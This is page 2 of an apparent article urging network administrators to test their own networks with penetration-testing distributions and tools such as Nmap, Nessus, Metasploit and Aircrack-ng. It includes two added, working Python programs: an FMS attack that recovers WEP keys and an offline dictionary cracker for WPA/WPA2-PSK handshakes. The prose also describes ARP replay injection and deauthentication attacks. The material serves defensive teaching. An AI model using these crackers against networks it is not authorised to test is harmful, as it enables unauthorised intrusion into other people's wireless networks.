Bad-Guy Tools for Good Guys - page 2
When You Have to Make an Omelette...
So where do you start? The first thing to do is to choose an .iso to download, and the truth is you should probably try two or three: each one is targeted at a slightly different user, although there is a great deal of overlap in the tools that are included with them. Some of the more popular ones include Backtrack, STD (security tool distribution) and nUbuntu.
Once you've booted into one of these distributions, the next thing to do is to familiarize yourself with some of the apps included and get to work. There are usually plenty of old favorites like Wireshark (the network protocol analyzer formerly known as Ethereal) and, if you've not come across them before, some that may raise an eyebrow, including Nmap, Nessus, Metasploit, and Aircrack and its newer incarnation, Aircrack-ng.
Nmap is a powerful network mapper which can scan even very large corporate networks to see which hosts are up, which ports and services they expose and, with its service and OS detection options, which software versions are running; that makes it just as good at finding unauthorized servers as at auditing the ones you know about. It's worth seeing what you--and anyone else running it on your network--could find out by giving it a spin.
Nessus is a vulnerability scanner: it port-scans each host, then runs its library of checks against the services it finds, and some of those checks are intrusive enough to crash a vulnerable machine. You may not want that on a production box--Nessus's "safe checks" setting disables the dangerous plugins--but running the full set can be very useful in a test environment before a machine is deployed.
Metasploit is a rather more sinister matter altogether. Essentially it's a point-and-click hacking tool: choose the platform or application you want to attack, pick an exploit and a payload from the list, and launch the attack. With a friendly Web interface it's usable by script kiddies, but the point to bear in mind is that if anyone can launch these exploits, someone probably will, so you might as well find out whether they succeed against your systems before somebody else does.
Aircrack/Aircrack-ng is interesting because although everyone knows--or should know--that WEP is totally insecure, it's often assumed that though that's true in theory, in practice it's probably quite time consuming to crack it. By running the Aircrack suite you can see for yourself that in fact it's trivial to discover a WEP "protected" wireless network and get your hands on the WEP key from a single laptop. By capturing a single encrypted ARP request and injecting it back at the access point over and over, you can make the access point re-broadcast it under a fresh initialization vector (IV) each time, generating huge volumes of packets even when legitimate users are relatively idle; since every WEP frame starts with the same known header bytes, each new IV leaks a little about the key, and capturing enough of the vulnerable IVs is enough to crack it in as little as 15 minutes. And remember, if you've got an access point running in mixed WEP and WPA mode to accommodate users with older Wi-Fi equipment that doesn't support WPA, then that's just as vulnerable as one running only WEP: the recovered WEP key gets the attacker onto the network all the same.
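The IV weakness described above, worked through as an added example (this is not code from the article or from the Aircrack project): a constructed 40-bit WEP key encrypts a constructed ARP request under a few thousand IVs, including the classic FMS weak IVs of the form (B+3, 255, X), and the attacker recovers the key byte by byte from nothing but the IV and the first ciphertext byte of each frame. It implements the original Fluhrer-Mantin-Shamir attack rather than the faster PTW attack that current aircrack-ng uses, and, like aircrack-ng's "fudge factor", it tolerates a wrong top vote by searching the top three candidates per byte and verifying each full key against a frame's ICV. Frames are simplified to (IV, encrypted body) tuples; 802.11 headers and the key-index byte are left out.

```python
import random
import zlib


def rc4_ksa(key):
    """RC4 key scheduling: the initial permutation S for `key` (bytes)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n keystream bytes of RC4 under `key`."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Every WEP data frame starts with the LLC/SNAP header, so the attacker always
# knows the first plaintext byte (0xAA) and therefore the first keystream byte.
SNAP_HEADER = bytes.fromhex("aaaa030000000806")                     # LLC/SNAP, ethertype 0x0806 (ARP)
ARP_REQUEST = (SNAP_HEADER + bytes.fromhex("0001080006040001")       # Ethernet/IPv4, op=request
               + bytes.fromhex("020000000001") + bytes([10, 0, 0, 2])  # sender MAC/IP (constructed)
               + bytes(6) + bytes([10, 0, 0, 1]))                      # target MAC/IP (constructed)


def wep_encrypt(secret, iv, payload):
    """WEP frame body: RC4(IV || secret) over payload || CRC32(payload) (the ICV)."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_keystream(bytes(iv) + secret, len(payload) + 4)
    return bytes(p ^ k for p, k in zip(payload + icv, ks))


def wep_icv_ok(secret, iv, body):
    """Decrypt with a candidate key and check the ICV: how a guessed key is verified."""
    ks = rc4_keystream(bytes(iv) + secret, len(body))
    plain = bytes(c ^ k for c, k in zip(body, ks))
    return zlib.crc32(plain[:-4]).to_bytes(4, "little") == plain[-4:]


def fms_votes(frames, known):
    """FMS votes for the next secret-key byte, given the bytes recovered so far."""
    b = len(known)
    votes = [0] * 256
    for iv, body in frames:
        k = list(iv) + known
        S = list(range(256))
        j = 0
        for i in range(b + 3):          # replay the KSA steps the attacker can reproduce
            j = (j + S[i] + k[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        # "resolved" IV: with ~5% probability the first keystream byte equals S[b+3]
        # as it stands right after KSA step b+3, which depends directly on key byte b+3
        if S[1] < b + 3 and (S[1] + S[S[1]]) & 0xFF == b + 3:
            z = body[0] ^ SNAP_HEADER[0]                 # first keystream byte
            votes[(S.index(z) - j - S[b + 3]) & 0xFF] += 1
    return votes


def fms_crack(frames, key_len, fudge=3):
    """Depth-first search over the top-`fudge` candidates per byte, ICV-checking
    each complete key (the equivalent of aircrack-ng's fudge factor)."""
    check_iv, check_body = frames[0]

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            return key if wep_icv_ok(key, check_iv, check_body) else None
        votes = fms_votes(frames, known)
        for cand in sorted(range(256), key=lambda c: -votes[c])[:fudge]:
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


def demo():
    """Constructed capture: the AP re-broadcasts replayed ARP requests under fresh
    IVs, among them the FMS weak IVs (B+3, 255, X) for every key byte B."""
    secret = bytes.fromhex("1f2b3c4d5e")                   # constructed 40-bit WEP key
    rng = random.Random(1)
    ivs = [(b + 3, 255, x) for b in range(len(secret)) for x in range(256)]
    ivs += [tuple(rng.randrange(256) for _ in range(3)) for _ in range(1000)]
    rng.shuffle(ivs)
    frames = [(iv, wep_encrypt(secret, iv, ARP_REQUEST)) for iv in ivs]
    return fms_crack(frames, len(secret))


if __name__ == "__main__":
    print(demo().hex())
```

The point to take from it is that nothing about the attack is expensive: each frame costs the attacker a handful of KSA steps, the voting is a table lookup, and the ARP replay described above is simply a way of making the access point hand over the IVs the attacker wants.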
The Aircrack toolset can also be used to crack WPA passphrases, but since this relies on a deauthentication (deauth) attack to force a client to reconnect, capturing the four-way handshake that follows, and then an offline dictionary attack against it, it will only work if the passphrase is weak enough to be in the attacker's wordlist. The cipher makes no difference here: a WPA2-PSK network using AES-CCMP is exposed in exactly the same way as the older RC4/TKIP-based WPA-PSK, because what is being guessed is the pre-shared key itself. So armed with a suitably large dictionary, you can at least satisfy yourself that if you are using a pre-shared key (which you probably shouldn't--you should be using WPA-Enterprise, that is 802.1X with a RADIUS server, instead) your passphrase is not going to fall to it. Ideally that means a random string of 63 characters (the maximum the standard allows), which is uncrackable in any sensible period of time.
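The offline dictionary attack in the paragraph above, as an added example (this is not code from the article or from the Aircrack project): the SSID, MAC addresses, nonces and EAPOL-Key message are constructed stand-ins for what airodump-ng would capture, the network's "real" passphrase is a constructed weak one, and the key derivation (PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-MD5 or HMAC-SHA1 for the message MIC) is the standard 802.11i construction, which is why the same code cracks WPA2-PSK as well as WPA-PSK.

```python
import hashlib
import hmac


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the fixed cost of every guess; the SSID acts as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from the 802.11i PRF-512 over the two MACs and the two handshake nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame, version):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for WPA/TKIP
    (key descriptor version 1), HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP (version 2)."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_frame, mic, version):
    """Offline dictionary attack: derive the KCK for each candidate and compare MICs."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, version), mic):
            return candidate
    return None


# Constructed handshake material standing in for a real capture.
SSID = "corp-guest"
AA = bytes.fromhex("001122334455")          # AP MAC (constructed)
SPA = bytes.fromhex("66778899aabb")         # client MAC (constructed)
ANONCE = bytes(range(32))                   # constructed nonces
SNONCE = bytes(range(32, 64))
VERSION = 1                                 # WPA/TKIP; use 2 for WPA2/CCMP
# EAPOL-Key message 2 as transmitted, MIC field zeroed (constructed bytes, not a real frame).
EAPOL_M2 = (bytes.fromhex("0103005ffe010900000000000000000001") + SNONCE
            + bytes(16 + 8 + 8) + bytes(16) + bytes.fromhex("0000"))


def sniffed_mic(real_passphrase):
    """What the client puts in message 2: the attacker reads this straight off the air."""
    kck = wpa_ptk(wpa_pmk(real_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2, VERSION)


def demo(wordlist=("password", "letmein", "corpguest", "sunshine1", "welcome123")):
    mic = sniffed_mic("sunshine1")          # the network's real passphrase (constructed)
    return crack_psk(wordlist, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, mic, VERSION)


if __name__ == "__main__":
    print(demo())
```

Two things are worth noticing. The attacker never talks to the access point after the deauth; everything from the PBKDF2 call onwards runs offline at whatever rate the attacker's hardware allows. And the only thing standing between the captured handshake and the key is the size of the search space, which is exactly why a 63-character random passphrase holds and a word from a dictionary does not.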
The list of security--or should that be hacker--tools included on these CDs is almost endless--certainly too long to list here. But the point is they are out there, they are powerful, and they can do your network serious harm. They are also free and freely available, and they are not going away. In these circumstances the only sensible response is to try them out for yourself and close any vulnerabilities they expose. It won't guarantee your network's security, but it will make sure that anyone who wants to break into your network is going to have to work a little bit harder if they want to succeed.